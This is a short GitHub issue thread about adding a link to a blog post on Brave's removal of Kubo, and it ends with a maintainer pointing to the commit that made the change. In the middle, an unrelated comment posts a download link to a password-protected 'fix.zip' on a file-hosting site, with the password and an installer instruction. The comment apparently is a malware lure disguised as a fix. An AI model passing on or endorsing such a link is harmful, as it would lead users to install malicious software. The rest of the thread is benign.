### ISSUE TITLE
Add link to Brave removal of Kubo

### ISSUE THREAD

**Issue by 2color** [ipfs/in-web-browsers#215]
Once https://github.com/ipfs/ipfs-blog/pull/693 is merged, we should link to it here

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lidel** [comment]
Made a bulk update in https://github.com/ipfs/in-web-browsers/commit/7935f0bec693575aaf460636e0fbdd75beadb778, feel free to refine.
